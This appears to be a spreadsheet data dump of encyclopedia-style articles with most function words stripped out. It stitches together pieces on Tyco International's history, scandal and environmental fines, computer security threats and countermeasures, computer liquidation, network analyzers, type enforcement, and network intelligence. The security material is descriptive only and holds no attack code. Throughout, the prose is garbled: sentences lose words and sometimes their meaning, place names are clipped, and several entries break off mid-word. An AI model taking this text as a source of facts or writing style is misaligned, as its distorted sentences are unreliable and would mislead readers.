india's largest conglomerates. valued billion telecommunications bubble.tyco continued divestiture program throughout 2005. largest divestiture came announcement definitive agreement sell plastics, adhesives ludlow coated products businesses affiliate private investment firm apollo management, l.p. tyco believed segment longer within company's portfolio.tyco awarded largest statewide public safety communications project united states 2004 tyco electronics' businesses, m/a-com technology solutions, signed contract maintain york's statewide wireless network (swn). contract worth approximately billion would last years.tyco also acquired companies healthcare segment, vivant medical inc. floréane medical implants. 2006–2007 february 2006, group institutional investors, part existing lawsuit tyco international, sued company stop proposed breakup plan.by fiscal year 2006, tyco's revenue eclipsed billion. despite strong cash flow, growing revenue decreased debt, tyco board directors approved plan separate tyco three publicly independent companies. tyco believed would allow segment perform better within particular market create value shareholders.the separation completed july 2007, tyco separated three publicly independent companies: covidien ltd. (formerly tyco healthcare) tyco electronics ltd. (now connectivity) tyco international ltd. (formerly tyco fire security tyco engineered products services (tfs/teps))following separation, chairman breen remained head tyco international, composed five major business segments: worldwide, fire protection services, safety products, flow control electrical metal products. company generated revenue $18.8 billion 2007, employed 118,000 people across states countries. 2010s 2010 tyco filed kozlowski, asserting $500 million compensation benefits received time disloyalty, 1997 2002, forfeit york’s "faithless servant" doctrine. southern district york judge thomas griesa concluded 2010 faithless servant doctrine, kozlowski must forfeit compensation benefits earned period disloyalty. 2011–2012 tyco international announced january 2011 acquiring brink's home security holdings (operating broadview security) transaction valued $2.0 billion. reported broadview security would merge tyco's security services division. 2011, tyco acquired visonic, developer manufacturer home security alarm systems components, $100 million. visonic established 1973 brothers moshe yaacov kotlicki. visonic initial public offering london stock exchange 2004 valuation million removed 2010 lse. june 2006, visonic shares traded aviv stock exchange.in september 2011, tyco international's directors announced plans split company again, separating company's flow control business, north america's residential security business international fire security business plan chief executive breen described "the best path create long-term shareholder value."the separation completed october 2012, resulting following companies created: tyco: focused fire protection electronic security products, installation services worldwide. corporation north america: focused residential small business security installation services north america. flow control: focused water fluid solutions, valves controls, equipment protection products worldwide. this business merged pentair inc. part pentair valve controls business 2012. this pentair division acquired emerson electric 2017.tyco retained brand security installation services outside north america. adt's commercial security installation services business north america rebranded became tyco integrated security. tyco 70,000 employees worldwide, operating nearly countries serving three million customers. september 2012, tyco accused violation foreign corrupt practices (fcpa) agreed payment around million civil penalties u.s. securities exchange commission. 2013 november 2013, tyco approached various private equity firms offering sell korean security unit, caps 2014 february 2014, private equity firm carlyle group entered talks tyco acquire south korean security systems unit, valued around billion.in 2014, tyco international sold zealand based security company armourguard security limited evergreen international, cost sale released. corporate scandal 2002 former chairman chief executive dennis kozlowski former chief financial officer mark swartz accused theft us$150 million company. during trial march 2004, contended board directors authorized compensation.during jury deliberations, juror ruth jordan, passing courtroom, appeared make "okay" sign table. later denied intended gesture, incident received much publicity (including caricature wall street journal), juror received threats name became public. judge michael obus declared mistrial april 2004. june 2005, retrial, kozlowski swartz convicted counts them. verdicts carry potential jail terms years state prison. kozlowski swartz sentenced less eight years four months years prison. then 2007, hampshire federal district court judge paul barbadoro approved class action settlement whereby tyco agreed $2.92 billion conjunction $225 million pricewaterhouse coopers, auditors) class defrauded shareholders represented grant eisenhofer p.a., schiffrin, barroway, topaz kessler, milberg weiss bershad. january 2014, kozlowski granted parole lincoln correctional facility york city. revenues year denotes year tyco's separation three publicly independent companies. products some many products made tyco included: cctv/access control equipment (tyco integrated security, american dynamics, kantech, software house, systems) circuit protection devices (electronic article surveillance) rfid (radio frequency identification) products (sensormatic) engineering services fire alarm systems (simplex, tyco integrated security) fire sprinklers (simplexgrinnell, wormald) fire-fighting hardware (scott safety) fire-fighting foam concentrates (ansul, chemguard, skum, total walther, sabo) grinnell grooved products safety products (including industrial-site safety personal protective equipment (ppe) scott safety) security systems (tyco integrated security, adt, dsc) physical security information management (proximex) valves controls pressure-relief valves nuclear power generation environmental record clean (caa), tyco international (us) inc. fined $1.1 million previous metal forming finishing facility hamburg, jersey failed comply requirements regulations. facility, tyco operated 1963 2000, operated trichloroethylene degrease chromium metal parts, among toxic, dangerous pollutants could cause serious health effects.in regards clean water act, health safety manager enfield, connecticut, sentenced guilty august 2002 deliberately routing wastewater produced tyco’s manufacturing facilities around sand filter; supposed remove impurities wastewater discharging manchester sewers. company used bypass order accelerate production lessen waste treatment system. however, wastewater discharged factory exceeded levels copper lead, toxic metals could harmful effects passed sewage treatment plants.tyco printed circuit group (tpcg) stamford, connecticut, sentenced counts violating clean water august 2004. plea agreement called tpcg total million fines. amount, million paid federal criminal fine; $2.7 million went connecticut department environmental protection's (dep) natural resources fund; towns stafford manchester received $500,000 fund improvements sewer water treatment system; $300,000 paid recycling deionized wastewater company's stafford, staffordville facilities. between 1999 june 2001, tpcg managers company's stafford, staffordville manchester facilities engaged variety practices caused facilities discharge wastewater higher permitted levels pollutants municipal sewage treatment systems. illegal practices included, limited diluting potentially non-compliant wastewater samples, discarding samples excessive levels toxic metals, omitting samples compliance daniel callahan, former director environmental health safety stafford division tyco printed circuit group, pleaded guilty violating clean water november 2003. callahan falsified reports submitted connecticut department environmental protection (dep). reports failed include fact "batch tank" discharged manchester public sewer system. tyco's permit required discharges public sewer systems reported. tyco 41st 2002 political economy research institute's (peri) toxic 100.when tyco acquired ansul, also became responsible arsenic salt contamination local environment. restatement june 2000, company restated figures 1999 annual report shareholders. october 2001, company adopted provisions 101, related revenue recognition, fourth quarter fiscal 2001, results first three quarters fiscal 2001 restated. october 2002, company restated earnings earlier year 2002 questions raised internal audit accounted dealer fees involving home security systems business. june 2003, company restated several years financial results connection securities regulators' previously announced review filings. also notes references hill michaels, "paw taste condemns kozlowski: report says tyco bought $15,000 umbrella stand chief's apartment" september 2002) financial times external links tyco international website tyco telecommunications website tyco healthcare tyco fire security yahoo! tyco international ltd. company profile forbes.com: tyco's goodwill games scott safety</t>
  </si>
  <si>
    <t>Computer security</t>
  </si>
  <si>
    <t>computer security, cybersecurity (cyber security), information technology security security) protection computer systems networks information disclosure, theft damage hardware, software, electronic data, well disruption misdirection services provide.the field become significance expanded reliance computer systems, internet, wireless network standards bluetooth wi-fi, growth "smart" devices, including smartphones, televisions, various devices constitute internet things (iot). cybersecurity also significant challenges contemporary world, complexity information systems, terms political usage technology. primary goal ensure system's dependability, integrity, data privacy. history since internet's arrival digital transformation initiated recent years, notion cybersecurity become familiar subject professional personal lives. cybersecurity cyber threats consistently present last years technological change. 1970s 1980s, computer security mainly limited academia conception internet, where, increased connectivity, computer viruses network intrusions began take off. after spread viruses 1990s, 2000s marked institutionalization cyber threats cybersecurity. april 1967 session organized willis ware spring joint computer conference, later publication ware report, foundational moments history field computer security. ware's work straddled intersection material, cultural, political, social concerns.a 1977 nist publication introduced "cia triad" confidentiality, integrity, availability clear simple describe security goals. while still relevant, many elaborate frameworks since proposed.however, 1970s 1980s grave computer threats computers internet still developing, security threats easily identifiable. most often, threats came malicious insiders gained unauthorized access sensitive documents files. although malware network breaches existed early years, financial gain. second half 1970s, established computer firms like started offering commercial access control systems computer security software products.it started creeper 1971. creeper experimental computer program written thomas bbn. considered first computer worm. 1972, first anti-virus software created, called reaper. created tomlinson move across arpanet delete creeper worm. between september 1986 june 1987, group german hackers performed first documented case cyber espionage. group hacked american defense contractors, universities, military bases' networks sold gathered information soviet kgb. group markus hess, arrested june 1987. convicted espionage (along co-conspirators) 1990. 1988, first computer worms, called morris worm, distributed internet. gained significant mainstream media attention. 1993, netscape started developing protocol ssl, shortly national center supercomputing applications (ncsa) launched mosaic 1.0, first browser, 1993. netscape version ready 1994, never released public many serious security vulnerabilities. these weaknesses included replay attacks vulnerability allowed hackers alter unencrypted communications sent users. however, february 1995, netscape launched version 2.0. failed offensive strategy national security agency (nsa) responsible protection u.s. information systems also collecting foreign intelligence. these duties conflict other. protecting information systems includes evaluating software, identifying security flaws, taking steps correct flaws, defensive action. collecting intelligence includes exploiting security flaws extract information, offensive action. correcting security flaws makes flaws unavailable exploitation. agency analyzes commonly used software order find security flaws, reserves offensive purposes competitors united states. agency seldom takes defensive action reporting flaws software producers eliminate them.the offensive strategy worked while, eventually nations, including russia, iran, north korea, china, acquired offensive capability tended united states. contractors created sold "click-and-shoot" attack tools u.s. agencies close allies, eventually tools made foreign adversaries. 2016, nsas hacking tools hacked, used russia north korea. nsa's employees contractors recruited high salaries adversaries, anxious compete cyberwarfare.for example, 2007, united states israel began exploiting security flaws microsoft windows operating system attack damage equipment used iran refine nuclear materials. iran responded heavily investing cyberwarfare capability, began using united states. vulnerabilities attacks vulnerability weakness design, implementation, operation, internal control. most vulnerabilities discovered documented common vulnerabilities exposures (cve) database. exploitable vulnerability least working attack exploit exists. vulnerabilities researched, reverse-engineered, hunted, exploited using automated tools customized scripts. secure computer system, important understand attacks made threats typically classified categories below: backdoor backdoor computer system, cryptosystem algorithm, secret method bypassing normal authentication security controls. they exist many reasons, including original design poor configuration. they added authorized party allow legitimate access, attacker malicious reasons; regardless motives existence, create vulnerability. backdoors hard detect, backdoors usually discovered someone access application source code intimate knowledge operating system computer. denial-of-service attack denial service attacks (dos) designed make machine network resource unavailable intended users. attackers deny service individual victims, deliberately entering wrong password enough consecutive times cause victim's account locked, overload capabilities machine network block users once. while network attack single address blocked adding firewall rule, many forms distributed denial service (ddos) attacks possible, attack comes large number points defending much difficult. such attacks originate zombie computers botnet range possible techniques, including reflection amplification attacks, innocent systems fooled sending traffic victim. direct-access attacks unauthorized user gaining physical access computer likely able directly copy data they also compromise security making operating system modifications, installing software worms, keyloggers, covert listening devices using wireless microphones. even system protected standard security measures, bypassed booting another operating system tool cd-rom bootable media. disk encryption trusted platform module designed prevent attacks. eavesdropping eavesdropping surreptitiously listening private computer "conversation" (communication), typically hosts network. instance, programs carnivore narusinsight used federal bureau investigation (fbi) eavesdrop systems internet service providers. even machines operate closed system (i.e., contact outside world) eavesdropped upon monitoring faint electromagnetic transmissions generated hardware; tempest specification referring attacks. multi-vector, polymorphic attacks surfacing 2017, class multi-vector, polymorphic cyber threats combined several types attacks changed form avoid cybersecurity controls spread. phishing phishing attempt acquiring sensitive information usernames, passwords, credit card details directly users deceiving users. phishing typically carried email spoofing instant messaging, often directs users enter details fake website whose "look" "feel" almost identical legitimate one. fake website often asks personal information, log-in details passwords. this information used gain access individual's real account real website. preying victim's trust, phishing classified form social engineering. attackers using creative ways gain access real accounts. common scam attackers send fake electronic invoices individuals showing recently purchased music, apps, others, instructing click link purchases authorized. privilege escalation privilege escalation describes situation attacker level restricted access able without authorization, elevate privileges access level. example, standard computer user able exploit vulnerability system gain access restricted data; even become "root" full unrestricted access system. reverse engineering reverse engineering process man-made object deconstructed reveal designs, code, architecture, extract knowledge object; similar scientific research, difference scientific research natural phenomenon.: side-channel attack computational system affects environment form. this effect environment, includes wide range criteria, range electromagnetic radiation, residual effect cells consequent make cold boot attack possible, hardware implementation faults allow access guessing values normally inaccessible. side-channel attack scenarios attacker would gather information system network guess internal state, result access information assumed victim secure. social engineering social engineering, context computer security, aims convince user disclose secrets passwords, card numbers, etc. grant physical access example, impersonating senior executive, bank, contractor, customer. this generally involves exploiting peoples trust, relying cognitive biases. common scam involves emails sent accounting finance department personnel, impersonating urgently requesting action. early 2016, reported "business email compromise" (bec) scams cost businesses billion years.in 2016, milwaukee bucks team victim type cyber scam perpetrator impersonating team's president peter feigin, resulting handover team's employees' 2015 forms. spoofing spoofing masquerading valid entity falsification data (such address username), order gain access information resources otherwise unauthorized obtain. there several types spoofing, including: email spoofing, attacker forges sending (from, source) address email. address spoofing, attacker alters source address network packet hide identity impersonate another computing system. spoofing, attacker modifies media access control (mac) address network interface controller obscure identity, pose another. biometric spoofing, attacker produces fake biometric sample pose another user. tampering tampering describes malicious modification alteration data. so-called evil maid attacks security services planting surveillance capability routers examples. malware malicious software (malware) installed computer leak information, personal information, business information passwords, give control system attacker, corrupt delete data permanently. information security culture employee behavior impact information security organizations. cultural concepts help different segments organization work effectively work effectiveness towards information security within organization. information security culture "...totality patterns behavior organization contributes protection information kinds."andersson reimers (2014) found employees often part organization's information security effort often take actions impede organizational changes. indeed, verizon data breach investigations report 2020, examined 3,950 security breaches, discovered cyber security incidents involved internal actors within company. research shows information security culture needs improved continuously. ″information security culture analysis change″, authors commented, ″it's never-ending process, cycle evaluation change maintenance.″ manage information security culture, five steps taken: pre-evaluation, strategic planning, operative planning, implementation, post-evaluation. pre-evaluation: identify awareness information security within employees analyze current security policies. strategic planning: come better awareness program, clear targets need set. assembling team skilled professionals helpful achieve operative planning: good security culture established based internal communication, management-buy-in, security awareness training program. implementation: four stages used implement information security culture. they are:commitment management communication organizational members courses organizational members commitment employeespost-evaluation: assess success planning implementation, identify unresolved areas concern. systems risk growth number computer systems increasing reliance upon individuals, businesses, industries, governments means increasing number systems risk. financial systems computer systems financial regulators financial institutions like u.s. securities exchange commission, swift, investment banks, commercial banks prominent hacking targets cybercriminals interested manipulating markets making illicit gains. websites apps accept store credit card numbers, brokerage accounts, bank account information also prominent hacking targets, potential immediate financial gain transferring money, making purchases, selling information black market. in-store payment systems atms also tampered order gather customer account data pins. utilities industrial equipment computers control functions many utilities, including coordination telecommunications, power grid, nuclear power plants, valve opening closing water networks. internet potential attack vector machines connected, stuxnet worm demonstrated even equipment controlled computers connected internet vulnerable. 2014, computer emergency readiness team, division department homeland security, investigated hacking incidents energy companies. aviation aviation industry reliant series complex systems could attacked. simple power outage airport cause repercussions worldwide, much system relies radio transmissions could disrupted, controlling aircraft oceans especially dangerous radar surveillance extends miles offshore. there also potential attack within aircraft.in europe, (pan-european network service) newpens, nextgen program, navigation service providers moving create dedicated networks. consequences successful attack range loss confidentiality loss system integrity, traffic control outages, loss aircraft, even loss life. consumer devices desktop computers laptops commonly targeted gather passwords financial account information, construct botnet attack another target. smartphones, tablet computers, smart watches, mobile devices quantified self devices like activity trackers sensors cameras, microphones, receivers, compasses, accelerometers could exploited, collect personal information, including sensitive health information. wifi, bluetooth, cell phone networks devices could used attack vectors, sensors might remotely activated successful breach.the increasing number home automation devices nest thermostat also potential targets. large corporations large corporations common targets. many cases attacks aimed financial gain identity theft involve data breaches. examples include loss millions clients' credit card details home depot, staples, target corporation, recent breach equifax.medical records targeted general identify theft, health insurance fraud, impersonating patients obtain prescription drugs recreational purposes resale. although cyber threats continue increase, organizations increase security training business 2015.not attacks financially motivated, however: security firm hbgary federal suffered serious series attacks 2011 hacktivist group anonymous retaliation firm's claiming infiltrated group, sony pictures hacked 2014 apparent dual motive embarrassing company data leaks crippling company wiping workstations servers. automobiles vehicles increasingly computerized, engine timing, cruise control, anti-lock brakes, seat belt tensioners, door locks, airbags advanced driver-assistance systems many models. additionally, connected cars wifi bluetooth communicate onboard consumer devices cell phone network. self-driving cars expected even complex. systems carry security risk, issues gained wide attention.simple examples risk include malicious compact disc used attack vector, car's onboard microphones used eavesdropping. however, access gained car's internal controller area network, danger much greater widely publicized 2015 test, hackers remotely carjacked vehicle miles away drove ditch.manufacturers reacting numerous ways, tesla 2016 pushing security fixes "over air" cars' computer systems. area autonomous vehicles, september 2016 united states department transportation announced initial safety standards, called states come uniform policies. government government military computer systems commonly attacked activists foreign powers. local regional government infrastructure traffic light controls, police intelligence agency communications, personnel records, student records, financial systems also potential targets largely computerized. passports government cards control access facilities rfid vulnerable cloning. internet things physical vulnerabilities internet things (iot) network physical objects devices, vehicles, buildings embedded electronics, software, sensors, network connectivity enables collect exchange data. concerns raised developed without appropriate consideration security challenges involved.while creates opportunities direct integration physical world computer-based systems, also provides opportunities misuse. particular, internet things spreads widely, cyberattacks likely become increasingly physical (rather simply virtual) threat. front door's lock connected internet, locked/unlocked phone, criminal could enter home press button stolen hacked phone. people could stand lose much credit card numbers world controlled iot-enabled devices. thieves also used electronic means circumvent non-internet-connected hotel door locks.an attack targets physical infrastructure and/or human lives sometimes referred cyber-kinetic attack. devices appliances gain currency, cyber-kinetic attacks become pervasive significantly damaging. medical systems medical devices either successfully attacked potentially deadly vulnerabilities demonstrated, including in-hospital diagnostic equipment implanted devices including pacemakers insulin pumps. there many reports hospitals hospital organizations getting hacked, including ransomware attacks, windows exploits, viruses, data breaches sensitive data stored hospital servers. december 2016 food drug administration released recommendations medical device manufacturers maintain security internet-connected devices structure enforcement. energy sector distributed generation systems, risk cyber attack real, according daily energy insider. attack could cause loss power large area long period time, attack could severe consequences natural disaster. district columbia considering creating distributed energy resources (der) authority within city, goal customers insight energy giving local electric utility, pepco, chance better estimate energy demand. d.c. proposal, however, would "allow third-party vendors create numerous points energy distribution, could potentially create opportunities cyber attackers threaten electric grid." impact security breaches serious financial damage caused security breaches, standard model estimating cost incident, data available made public organizations involved. "several computer security consulting firms produce estimates total worldwide losses attributable virus worm attacks hostile digital acts general. 2003 loss estimates firms range billion (worms viruses only) $226 billion (for forms covert attacks). reliability estimates often challenged; underlying methodology basically anecdotal."however, reasonable estimates financial cost security breaches actually help organizations make rational investment decisions. according classic gordon-loeb model analyzing optimal investment level information security, conclude amount firm spends protect information generally small fraction expected loss (i.e., expected value loss resulting cyber/information security breach). attacker motivation physical security, motivations breaches computer security vary attackers. some thrill-seekers vandals, activists, others criminals looking financial gain. state-sponsored attackers common well resourced started amateurs markus hess hacked kgb, recounted clifford stoll cuckoo's egg. additionally, recent attacker motivations traced back extremist organizations seeking gain political advantage disrupt social agendas. growth internet, mobile technologies, inexpensive computing devices rise capabilities also risk environments deemed vital operations. critical targeted environments susceptible compromise series proactive studies migrate risk taking consideration motivations types actors. several stark differences exist hacker motivation nation state actors seeking attack based ideological preference.a standard part threat modeling particular system identify might motivate attack system, might motivated breach level detail precautions vary depending system secured. home personal computer, bank, classified military network face different threats, even underlying technologies similar. computer protection (countermeasures) computer security, countermeasure action, device, procedure technique reduces threat, vulnerability, attack eliminating preventing minimizing harm cause, discovering reporting corrective action taken.some common countermeasures listed following sections: security design security design, alternately secure design, means software designed ground secure. case, security considered main feature. some techniques approach include: principle least privilege, part system privileges needed function. that way, even attacker gains access part, limited access whole system. automated theorem proving prove correctness crucial software subsystems. code reviews unit testing, approaches make modules secure formal correctness proofs possible. defense depth, design subsystem needs violated compromise integrity system information holds. default secure settings, design "fail secure" rather "fail insecure" (see fail-safe equivalent safety engineering). ideally, secure system require deliberate, conscious, knowledgeable free decision part legitimate authorities order make insecure. audit trails track system activity security breach occurs, mechanism extent breach determined. storing audit trails remotely, appended keep intruders covering tracks. full disclosure vulnerabilities, ensure window vulnerability kept short possible bugs discovered. security architecture open security architecture organization defines security architecture "the design artifacts describe security controls (security countermeasures) positioned, relate overall information technology architecture. these controls serve purpose maintain system's quality attributes: confidentiality, integrity, availability, accountability assurance services".techopedia defines security architecture unified security design addresses necessities potential risks involved certain scenario environment. also specifies apply security controls. design process generally reproducible." attributes security architecture are: relationship different components depend other. determination controls based risk assessment, good practices, finances, legal matters. standardization controls.practicing security architecture provides right foundation systematically address business, security concerns organization. security measures state computer "security" conceptual ideal, attained three processes: threat prevention, detection, response. these processes based various policies system components, include following: user account access controls cryptography protect systems files data, respectively. firewalls common prevention systems network security perspective properly configured) shield access internal network services, block certain kinds attacks packet filtering. firewalls hardware software-based. intrusion detection system (ids) products designed detect network attacks in-progress assist post-attack forensics, audit trails logs serve similar function individual systems. "response" necessarily defined assessed security requirements individual system cover range simple upgrade protections notification legal authorities, counter-attacks, like. special cases, complete destruction compromised system favored, happen compromised resources detected.today, computer security consists mainly "preventive" measures, like firewalls exit procedure. firewall defined filtering network data host network another network, internet, implemented software running machine, hooking network stack (or, case unix-based operating systems linux, built operating system kernel) provide real-time filtering blocking. another implementation so-called "physical firewall", consists separate machine filtering network traffic. firewalls common amongst machines permanently connected internet. some organizations turning data platforms, apache hadoop, extend data accessibility machine learning detect advanced persistent threats.however, relatively organizations maintain computer systems effective detection systems, fewer still organized response mechanisms place. result, reuters points out: "companies first time report losing electronic theft data physical stealing assets". primary obstacle effective eradication cybercrime could traced excessive reliance firewalls automated "detection" systems. basic evidence gathering using packet capture appliances puts criminals behind bars.in order ensure adequate security, confidentiality, integrity availability network, better known triad, must protected considered foundation information security. achieve objectives, administrative, physical technical security measures employed. amount security afforded asset determined value known. vulnerability management vulnerability management cycle identifying, remediating mitigating vulnerabilities, especially software firmware. vulnerability management integral computer security network security. vulnerabilities discovered vulnerability scanner, analyzes computer system search known vulnerabilities, open ports, insecure software configuration, susceptibility malware. order tools effective, must kept date every update vendor release. typically, updates scan vulnerabilities introduced recently. beyond vulnerability scanning, many organizations contract outside security auditors regular penetration tests systems identify vulnerabilities. sectors, contractual requirement. reducing vulnerabilities while formal verification correctness computer systems possible, common. operating systems formally verified include sel4, sysgo's pikeos make small percentage market. factor authentication method mitigating unauthorized access system sensitive information. requires "something know"; password pin, "something have"; card, dongle, cellphone, another piece hardware. this increases security unauthorized person needs gain access. social engineering direct computer access (physical) attacks prevented non-computer means, difficult enforce, relative sensitivity information. training often involved help mitigate risk, even highly disciplined environments (e.g. military organizations), social engineering attacks still difficult foresee prevent. inoculation, derived inoculation theory, seeks prevent social engineering fraudulent tricks traps instilling resistance persuasion attempts exposure similar related attempts.it possible reduce attacker's chances keeping systems date security patches updates, using security scanner and/or hiring people expertise security, though none guarantee prevention attack. effects data loss/damage reduced careful backing insurance. hardware protection mechanisms while hardware source insecurity, microchip vulnerabilities maliciously introduced manufacturing process, hardware-based assisted computer security also offers alternative software-only computer security. using devices methods dongles, trusted platform modules, intrusion-aware cases, drive locks, disabling ports, mobile-enabled access considered secure physical access sophisticated backdoor access) required order compromised. each covered detail below. dongles typically used software licensing schemes unlock software capabilities, also seen prevent unauthorized access computer device's software. dongle, key, essentially creates secure encrypted tunnel software application key. principle encryption scheme dongle, advanced encryption standard (aes) provides stronger measure security since harder hack replicate dongle simply copy native software another machine another security application dongles accessing web-based content cloud software virtual private networks (vpns). addition, dongle configured lock unlock computer. trusted platform modules (tpms) secure devices integrating cryptographic capabilities onto access devices, microprocessors, so-called computers-on-a-chip. tpms used conjunction server-side software offer detect authenticate hardware devices, preventing unauthorized network data access. computer case intrusion detection refers device, typically push-button switch, detects computer case opened. firmware bios programmed show alert operator computer booted next time. drive locks essentially software tools encrypt hard drives, making inaccessible thieves. tools exist specifically encrypting external drives well. disabling ports security option preventing unauthorized malicious access otherwise secure computer. infected dongles connected network computer inside firewall considered magazine network world common hardware threat facing computer networks. disconnecting disabling peripheral devices like camera, gps, removable storage etc.), use. mobile-enabled access devices growing popularity ubiquitous nature cell phones. built-in capabilities bluetooth, newer bluetooth energy (le), near-field communication (nfc) non-ios devices biometric validation thumbprint readers, well code reader software designed mobile devices, offer new, secure ways mobile phones connect access control systems. these control systems provide computer security also used controlling access secure buildings. secure operating systems term "computer security" refers technology used implement secure operating systems. 1980s, united states department defense (dod) used "orange book" standards, current international standard iso/iec 15408, "common criteria" defines number progressively stringent evaluation assurance levels. many common operating systems meet eal4 standard "methodically designed, tested reviewed", formal verification required highest levels means uncommon. example eal6 ("semiformally verified design tested") system integrity-178b, used airbus a380 several military jets. secure coding software engineering, secure coding aims guard accidental introduction security vulnerabilities. also possible create software designed ground secure. such systems secure design. beyond this, formal verification aims prove correctness algorithms underlying system; important cryptographic protocols example. capabilities access control lists within computer systems, main security models capable enforcing privilege separation access control lists (acls) role-based access control (rbac). access-control list (acl), respect computer file system, list permissions associated object. specifies users system processes granted access objects, well operations allowed given objects. role-based access control approach restricting system access authorized users, used majority enterprises employees, implement mandatory access control (mac) discretionary access control (dac). approach, capability-based security mostly restricted research operating systems. capabilities can, however, also implemented language level, leading style programming essentially refinement standard object-oriented design. open-source project area language. user security training end-user widely recognized weakest link security chain estimated security incidents breaches involve kind human error. among commonly recorded forms errors misjudgment poor password management, sending emails containing sensitive data attachments wrong recipient, inability recognize misleading urls identify fake websites dangerous email attachments. common mistake users make saving user id/password browsers make easier banking sites. this gift attackers obtained access machine means. risk mitigated two-factor authentication.as human component cyber risk particularly relevant determining global cyber risk organization facing, security awareness training, levels, provides formal compliance regulatory industry mandates considered essential reducing cyber risk protecting individuals companies great majority cyber threats. focus end-user represents profound cultural change many security practitioners, traditionally approached cybersecurity exclusively technical perspective, moves along lines suggested major security centers develop culture cyber awareness within organization, recognizing security-aware user provides important line defense cyber attacks. digital hygiene relat</t>
  </si>
  <si>
    <t>Computer liquidator</t>
  </si>
  <si>
    <t>computer liquidator buys computer technology related equipment longer required company, resells ("flips") another company. computer liquidators agents computer recycling, electronic recycling, business. there several reasons companies sell, liquidate, used information technology (i.t.) equipment: bankruptcy, downsizing expanding, technological advancement. technological advancement common reason, equipment longer performing tasks required usually rendered obsolete advanced technology coming market. this used obsolete technology often referred electronic waste. equipment designated outdated company still viable another company, whose operations require advanced solutions. often, information technology audit performed help company decide equipment needs updating, requirements are. reasons liquidation computer liquidation sustainable solution environmentally friendly. rapid technology change, initial cost, planned obsolescence resulted fast-growing surplus computers electronic components around globe. purpose computer liquidators keep many computers electronic parts landfills. newer better technology replaces hardware ever-increasing speed, amount technical trash increases technology replaced. speed hardware changes innovates last years follows, degree, moore's law. predictions made every landfill would soon overflowing discarded computer screens computers, along associated equipment keyboards mouses hardware associated internet. most electronic waste sent landfills incinerated, releases toxic materials lead, mercury, cadmium soil, groundwater, atmosphere, thus negative impact environment. best liquidating companies clearly outlined policies regarding disposal dangerous substances often issue information technology. liquidation avoids possible toxins pollution comes putting electronic waste landfills also avoids extra costs recycling. example, york passed 2015 banned putting electronic devices landfills. waste facilities rural counties forced either turn people away cost recycling cathode tubes. outside york city, counties spending million million year deal problem, according stephen acquario, executive director york state association counties. option liquidation actually incentivizes people electronic waste safer way, since recycling actually costs owner money, cases people would rather throw avoid recycling fee.computer liquidators effectively create secondary market meet demand looking cheaper solution require cutting edge technology. important note equipment liquidated ranges technology technology. because relatively lower price secondary market equipment, companies even purchase tech devices secondary market backups, stocking equipment preemptively replacement always hand event trouble. product availability also another reason buyers market. manufacturers generally refresh product line every months, typically liquidating older products. networking hardware often service lives five years more, resellers computer liquidators might carry products upwards decade old. users particular product find much easier cheaper add/replace older device rather take costs, business disruptions, knowledge gaps occur upgrading products. when newer products adopted, used equipment inevitably liquidated, thrown sold back, creates robust marketplace. process there typically three agents computer liquidation process: seller, computer liquidator, buyer. sellers companies bankrupt need sell assets, companies downsizing expanding, companies upgrading technology. usually, companies looking sell equipment first conduct information technology audit review systems equipment. process generally fueled supply side, computer liquidators rely available market liquidate resell. thus, nearly always exists shortage buyers. oceantech, example, buys computers, laptops, tablets electronics companies longer need technology. they conduct certified data destruction appliances. technicians perform thorough check systems confirm devices functional stored warehouse. certain parts, like motherboard hard drives, able used, stripped machine warehouse store. then, devices parts resold smaller companies places like school districts, need products. most companies involved computer liquidation business also heavily involved computer electronic recycling industry takes similar process disassembling testing. this process theoretically benefits ends exchange, seller gets money equipment longer needs buyer gets cheap equipment necessary work. resources number organizations sprung provide technical guidelines handling dealing ewaste. references</t>
  </si>
  <si>
    <t>Network analyzer</t>
  </si>
  <si>
    <t>network analyzer mean: packet analyzer, used computer data network network analyzer power), analog computer system used study electrical power networks network analyzer (electrical), type electronic test equipment also network management</t>
  </si>
  <si>
    <t>Type enforcement</t>
  </si>
  <si>
    <t>concept type enforcement (te), field information technology, access control mechanism regulating access computer systems. implementing gives priority mandatory access control (mac) discretionary access control (dac). access clearance first given subject (e.g. process) accessing objects (e.g. files, records, messages) based rules defined attached security context. security context domain defined domain security policy. linux security module (lsm) selinux, security context extended attribute. type enforcement implementation prerequisite mac, first step multilevel security (mls) replacement multi categories security (mcs). complement role-based access control (rbac). control type enforcement implies fine-grained control operating system, control process execution, also domain transition authorization scheme. this best implemented kernel module, case selinux. using type enforcement implement flask architecture. access using type enforcement, users microsoft active directory) selinux) associated kerberos realm, although original type enforcement model implies always necessary define access matrix containing rules clearance granted given security context, subject's rights objects according authorization scheme. security practically, type enforcement evaluates rules source security context subject, rules target security context object. clearance decision occurs depending access description (matrix). then, access control mechanisms (mls mcs, ...) apply. history type enforcement introduced secure target architecture late 1980s full implementation developed logical coprocessing kernel (lock) system. sidewinder internet firewall implemented custom version unix incorporated type enforcement. variant called domain type enforcement developed trusted mach system. original type enforcement model stated labels attached subject object: “domain label” subject “type label” object. this implementation mechanism improved flask architecture, substituting complex structures implicit relationship. also, original access matrix extended structures: lattice-based, history-based, environment-based, policy logic... this matter implementation various operating systems. selinux, implementation internally distinguish te-domain te-types. considered weakness original model specify detailed implementation aspects labels matrix, especially using terms “domain” “types” other, generic, widely accepted meanings. references loscocco, smalley, muckelbauer, taylor, turner, farrell. inevitability failure: flawed assumption security modern computing environments. proceedings 21st national information systems security conference, pages 303–314, october 1998. badger, sterne, sherman, walker haghighat, domain type enforcement unix prototype, proceedings usenix unix security symposium, june 1995. boebert kain, practical alternative hierarchical integrity policies, proceedings national computer security conference, page 1985. lock trusted computing system</t>
  </si>
  <si>
    <t>Network intelligence</t>
  </si>
  <si>
    <t>network intelligence (ni) technology builds concepts capabilities deep packet inspection (dpi), packet capture business intelligence (bi). examines, real time, data packets cross communications networks identifying protocols used extracting packet content metadata rapid analysis data relationships communications patterns. also, sometimes referred network acceleration piracy. used middleware capture feed information network operator applications bandwidth management, traffic shaping, policy management, charging billing (including usage-based content billing), service assurance, revenue assurance, market research mega panel analytics, lawful interception cyber security. currently incorporated wide range applications vendors provide technology solutions communications service providers (csps), governments large enterprises. extends network controls, business capabilities, security functions data mining products services needed since emergence wireless technologies. background evolution growth internet wireless technologies offer possibilities types products services, well opportunities hackers criminal organizations exploit weaknesses perpetrate cyber crime. network optimization security solutions therefore need address exponential increases traffic, methods access, types activity volume content generated. traditional tools established vendors historically addressed specific network infrastructure applications bandwidth management, performance optimization quality service (qos). focuses recognizing different types traffic part csp's infrastructure. provides granular analysis. enables vendors create information layer metadata traffic feed multiple applications detailed expansive visibility network-based activity. technology goes beyond traditional dpi, since recognizes protocols also extracts 